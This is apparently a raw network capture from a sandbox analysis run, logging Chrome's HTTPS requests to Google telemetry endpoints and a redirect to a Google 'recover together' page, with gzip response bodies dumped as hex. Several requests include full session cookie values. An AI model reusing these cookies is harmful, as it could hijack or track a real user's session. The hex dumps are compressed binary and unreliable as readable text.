                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC1440OUTPOST /gen_204?atyp=csi&ei=CsT2Zo-iIaySxc8Pn72EmA8&s=promo&rt=hpbas.6217,hpbarr.1840&zx=1727448081757&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5FBaNma4lS8GS6qHZc6CXA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          68192.168.2.749830142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:32 UTC1638OUTGET /url?q=https://recovertogether.withgoogle.com/%3Futm_source%3DHPP%26utm_medium%3Dreferral%26utm_campaign%3Drecovertogether&source=hpp&id=19043977&ct=3&usg=AOvVaw3Ul98WUHTNkBRDd9asP537&sa=X&ved=0ahUKEwiPz-fGreOIAxUsSfEDHZ8eAfMQ8IcBCBc HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:32 UTC675INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                          Location: https://recovertogether.withgoogle.com/?utm_source=HPP&utm_medium=referral&utm_campaign=recovertogether
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JiWR2B49Cc5ILqfDZ-SF6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:32 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 308
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:32 UTC308INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 72 65 63 6f 76 65 72 74 6f 67 65 74 68 65 72 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 48 50 50 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f
                                                                                                                                                                                                                                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://recovertogether.withgoogle.com/?utm_source=HPP&amp;utm_medium=referral&amp;utm_


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          69192.168.2.749832142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:32 UTC1553OUTPOST /gen_204?atyp=i&ei=CsT2Zo-iIaySxc8Pn72EmA8&ct=slh&v=t1&m=HV&pv=0.6956181706646587&me=1:1727448074778,V,0,0,1280,907:0,B,907:0,N,1,CsT2Zo-iIaySxc8Pn72EmA8:0,R,1,1,0,0,1280,907:5146,x:10766,e,B&zx=1727448090690&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:32 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-D3BPA7pD9zMMviqAq_oMVg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:32 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          70192.168.2.749833142.250.185.2414435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC717OUTGET /?utm_source=HPP&utm_medium=referral&utm_campaign=recovertogether HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC384INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: fa301deb57c592b6c28bb0f7d08a4af6
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 13890
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:33 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:34 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1006INData Raw: 1f 8b 08 00 00 00 00 00 02 ff ec 7d e9 72 db 48 96 ee 7f 3f 05 8a 1d 5d b6 a3 05 52 ab 25 d9 92 2b b4 d9 b2 ad cd da 6c b9 a3 83 01 12 49 12 12 08 d0 00 28 8a aa aa 88 7a 87 f9 33 37 e2 ce 03 dc 9f f7 19 e6 4d ea 49 e6 3b 27 33 81 04 09 52 d4 66 7b 3a 6a a2 a7 4c 01 89 5c 4e 9e 2d cf 96 2b 3f 6d ee 6f 1c 9f 1d 6c 59 ad a4 ed bf 7e b2 42 ff 58 be 13 34 57 4b 22 28 bd 7e 62 59 2b 2d e1 b8 f4 03 3f db 22 71 ac 7a cb 89 62 91 ac 96 ba 49 c3 5e e2 36 e9 ab 30 48 44 80 57 ef b6 56 b7 dc a6 28 a1 db a4 63 8b af 5d ef 72 b5 f4 d9 3e 59 b3 37 c2 76 c7 49 bc 9a 2f 72 5f 06 4e 5b ac 96 2e 3d d1 eb 84 51 52 b2 ea ba a7 9e e7 26 ad 55 57 5c 7a 75 61 f3 1f 53 96 17 78 89 e7 f8 76 5c 77 7c b1 3a 53 9e 9e b2 da ce 95 d7 ee b6 d5 a3 05 7a d4 12 5e b3 95 e8 4f e5 5f 7a cc
                                                                                                                                                                                                                                                                                          Data Ascii: }rH?]R%+lI(z37MI;'3Rf{:jL\N-+?molY~BX4WK"(~bY+-?"qzbI^60HDWV(c]r>Y7vI/r_N[.=QR&UW\zuaSxv\w|:Sz^O_z
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: 6d ee 64 c5 fc c3 b2 64 87 e5 74 7d d6 ea f0 a3 df 7e b3 b0 11 fc b5 65 e9 1d b3 9a 58 d2 b3 e7 bf a6 5f ca 4d 02 a7 e7 99 c5 cf 5f fd ae be e0 86 4f b1 17 53 56 b6 61 6a 49 96 ec e6 29 70 b3 e1 35 d1 62 60 ee 72 ca 45 0b b0 08 da 25 8d a8 e7 0a 4f 17 81 80 a2 36 bf 08 7c 75 ea b3 cb 0b 0b ae 53 af 2f 2e cd 2e cf cd 0b 67 ae b6 5c 9f 16 8b d3 ee ac bb 58 5b 58 6c 38 35 70 f8 e5 45 a7 56 73 1b 8b 2f e6 67 6b 0b cb 8c a7 e7 40 53 13 68 2b 15 ad fe ac d4 42 b7 af 78 44 10 2a 48 ae 78 8d 08 a8 24 27 74 e3 ce 07 71 99 f4 2b da 7a 63 9b 40 be 52 53 29 81 f3 4b 75 87 7e 31 fb 5f 2d b9 5e dc f1 9d fe cb 20 0c c4 ab 4b 2f f6 6a 9e ef 25 fd 97 2d cf 75 49 43 5b a9 c8 29 e0 47 3a 2b 09 39 d7 bb b4 ea be 13 c7 ab 25 a2 63 90 1f ab 72 22 d2 4f a3 c4 a6 c5 e1 81 fc 87
                                                                                                                                                                                                                                                                                          Data Ascii: mddt}~eX_M_OSVajI)p5b`rE%O6|uS/..g\X[Xl85pEVs/gk@Sh+BxD*Hx$'tq+zc@RS)Ku~1_-^ K/j%-uIC[)G:+9%cr"O
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: c6 d4 d8 41 f2 43 d9 f0 d4 0f 69 db 15 d1 eb 27 4f cc a3 85 69 25 22 8b 1a ef ff b8 06 76 ce 52 57 d4 32 67 f8 a4 06 19 86 c0 a8 90 59 f5 f4 69 81 7d 07 0f 6f f0 64 43 5d 0a 05 46 b6 fc 89 63 70 e9 76 dd 87 05 c4 20 00 9e 2a db 50 37 f8 4d de 12 9f 3b f0 11 e8 60 7f c5 f7 7c da d3 22 24 7f 64 30 26 53 04 b7 bc 51 35 a5 2a 82 d9 43 99 2c cd 19 98 96 8b 61 66 a1 ad 86 23 cf fc 26 f4 c8 5c 39 a0 c4 0e be 1e 61 7d 34 57 39 d0 83 26 e9 dc 63 c2 f9 dc 03 de d7 e1 e9 6b 16 95 71 b8 ec 97 0d d2 82 5f c1 dc 69 53 fc 3f 2e c3 93 23 dd 6e 8c 87 64 7b f7 19 ff b6 cc ef f6 63 3d 04 0b 54 a3 e6 ec 74 85 ea b4 3e 3e 0f a2 ea 00 7e 19 0c 81 ba ce 30 76 8c 2d ba d8 0e 3d 80 bc 83 f2 b0 00 29 34 15 4e 3a a5 71 36 e7 11 f6 e6 c7 9f d4 24 b6 e5 1b ec ca df 60 92 37 db 90 c7
                                                                                                                                                                                                                                                                                          Data Ascii: ACi'Oi%"vRW2gYi}odC]Fcpv *P7M;`|"$d0&SQ5*C,af#&\9a}4W9&ckq_iS?.#nd{c=Tt>>~0v-=)4N:q6$`7
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: e1 6b ed a4 97 13 24 f2 b2 b0 1e 00 8f 84 30 02 52 05 89 71 d7 aa f5 19 4c 43 03 cb de 23 2f 16 dd 0e f3 d8 e1 11 4e 65 8e dd 81 9c 01 8d 50 b6 ce 80 8e 24 8f 83 10 9b e7 23 32 ad 4c c4 44 c8 7c dc f2 62 42 7a ce c0 45 b2 4a cc c7 29 68 02 a1 85 58 1d ca 12 35 77 92 71 5b 77 44 59 bc 3c 59 80 9e 74 3e ce 75 e1 a9 cb 44 11 1e 43 92 b4 8c 0c 66 f9 a6 78 f2 10 f1 0e 26 cb 0c b2 1a 4d 1f c4 97 ac 9c 94 e7 ae 74 f0 2e 12 0e 65 ee 8e d9 be 5a 25 b4 b6 11 02 3d 90 18 02 7a a6 37 d6 04 5f e7 86 1c 37 39 35 98 f4 05 0d 7d 85 11 0d fe 59 30 49 f9 9d ad 74 c2 43 9d 69 2d 49 39 e5 7d 19 17 e7 a9 28 ad 45 06 d2 2a 45 68 0c 20 d4 18 ca 4b cd 2e e9 e2 33 e1 08 d9 71 c3 12 98 18 ec 5e 04 ad 7f 08 de 13 40 8e 3f 2f 00 1c 26 c3 91 9e 63 16 26 df 17 40 95 5f 64 a1 29 c4 2e
                                                                                                                                                                                                                                                                                          Data Ascii: k$0RqLC#/NeP$#2LD|bBzEJ)hX5wq[wDY<Yt>uDCfx&Mt.eZ%=z7_795}Y0ItCi-I9}(E*Eh K.3q^@?/&c&@_d).
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: 3b 7a ae c3 6e 0e b5 c5 a9 c1 e2 4c 76 7c 2f 42 55 22 44 e8 90 44 6f 00 77 a4 6c 4f bb 71 45 c7 0f fb b4 25 f0 c0 c0 b2 04 bf 51 4b f8 1d 56 99 a0 fa d4 ba 9e 0f 4f f2 05 fc 2d 6c 97 af 09 f6 b1 cb 8d 94 5a 53 da 3b 2d ed e0 f8 68 d3 8a fb ed 4e 12 b6 e3 b2 75 8a e2 57 c9 b0 0b 03 f3 86 a7 09 80 19 e1 46 c8 bd 67 3f 05 a6 02 fb 5b 14 c0 4d 41 3e 15 5e 1c db 45 35 12 90 b3 8b 26 80 aa a3 c2 0f 3b 00 37 ec bf 31 b9 6f e0 d2 45 88 81 8f 85 a1 93 18 c1 1b 19 3c a0 02 52 41 be 9a 53 bf 28 72 18 68 7a 34 c8 8a 1e 0d fe 39 16 81 ee 48 3f 9a 59 21 3b d0 27 3f 07 aa a8 b8 75 27 1e 3e 5d 4c 80 89 5a 77 d0 7d 59 ba af ef 4c 21 bb 28 c1 83 5d 0a 3b a8 a1 85 13 ac 5e 32 9c 40 f0 af f1 6e e9 89 f2 ce 29 86 2e 51 fa 1c 91 0c 81 e8 03 c5 d6 b1 dd 3d e9 e6 83 ea 1e b8 0d
                                                                                                                                                                                                                                                                                          Data Ascii: ;znLv|/BU"DDowlOqE%QKVO-lZS;-hNuWFg?[MA>^E5&;71oE<RAS(rhz49H?Y!;'?u'>]LZw}YL!(];^2@n).Q=
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: 94 06 6a a1 05 ae df 47 ec 3f ae 22 e1 08 7c 42 7f 32 4f 47 b0 2f 9e 01 6d 68 be 0a 19 69 b5 7a 51 b4 87 34 51 b2 b4 59 b5 f0 8a f6 83 37 fa 42 88 8e 85 0b b4 04 19 d5 19 7f 30 51 d8 ad bd e0 92 2f 9e 41 27 09 81 1d 77 88 24 53 4c 61 d2 39 a0 3a 0f c2 97 68 aa 53 00 e8 12 0e 6d 25 8d b1 3b 80 3f 19 4e 65 18 24 16 cb 3b c0 bb 88 b9 b4 65 6f 1a ae 7d 39 6e cf 01 1e c9 30 ff 9e 80 d7 04 1b 9c e2 da 16 81 54 62 0f 45 3e 98 79 0c e4 c8 77 30 41 b8 98 90 fd 01 b6 41 c0 05 b2 29 7f 06 e3 15 b0 19 9c 81 98 17 6d 13 51 02 21 25 71 1e 90 10 9d cb 29 9d 40 1b e3 09 60 7a 4f 24 82 24 b8 04 86 7d 1c 44 4e f8 ba 0c a3 06 9e a8 c5 11 75 77 22 ba c7 e5 95 dc 75 a4 0b d0 05 61 bc 6a 07 d8 0e df 9f 4a 18 e1 b4 42 06 a8 27 43 ff e2 8e 17 79 cc eb b8 ca a3 91 8d d1 ea 06 6e
                                                                                                                                                                                                                                                                                          Data Ascii: jG?"|B2OG/mhizQ4QY7B0Q/A'w$SLa9:hSm%;?Ne$;eo}9n0TbE>yw0AA)mQ!%q)@`zO$$}DNuw"uajJB'Cyn
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:33 UTC1390INData Raw: 20 85 01 a4 b3 4f ab b8 82 33 d3 35 45 39 4c 06 f9 66 0f 52 56 0e ba d6 66 c0 07 e3 ea 45 25 6e 10 58 88 1c 7b fd 1f db 9e c5 a5 47 3e ca 27 d0 94 4c ce 42 4d 06 0b dc 0c 9a 23 75 1b 7c af 56 28 ff a9 e1 68 78 c1 5a 20 ca 9e e0 82 dc 27 d6 e0 13 5d b7 dd 66 27 24 ae 79 51 89 fd 2f 2d ec 60 fd e2 55 56 d8 6d 78 4e a2 8f fa 33 61 af 64 dd 7f 30 64 e3 89 57 a5 e1 d9 49 bf 26 dd c9 18 e1 2e 24 c4 04 e2 9a c0 f6 4b 6b 66 a1 73 45 53 9b c4 fa a9 32 e3 49 33 d1 04 c4 f3 55 18 91 6e 36 c3 34 8b 8a 95 20 e5 84 6c ab 35 fb 1d d6 48 d7 30 4e ba 46 3e dd ca 2a 01 50 9a 70 f3 0e 97 25 6a 93 61 a6 39 70 4d 97 0c bb 2d 46 a0 4b 28 c6 e1 40 dc 9c 21 e3 24 48 e8 82 4d 7d bb 92 2c 91 e5 5c 90 70 4a ba 35 01 03 19 6e 1a e7 6e 6c 4a 0c ee 7f 5a 9a 6b 1f 84 d3 eb 55 dc 14 99
                                                                                                                                                                                                                                                                                          Data Ascii: O35E9LfRVfE%nX{G>'LBM#u|V(hxZ ']f'$yQ/-`UVmxN3ad0dWI&.$KkfsES2I3Un64 l5H0NF>*Pp%ja9pM-FK(@!$HM},\pJ5nnlJZkU
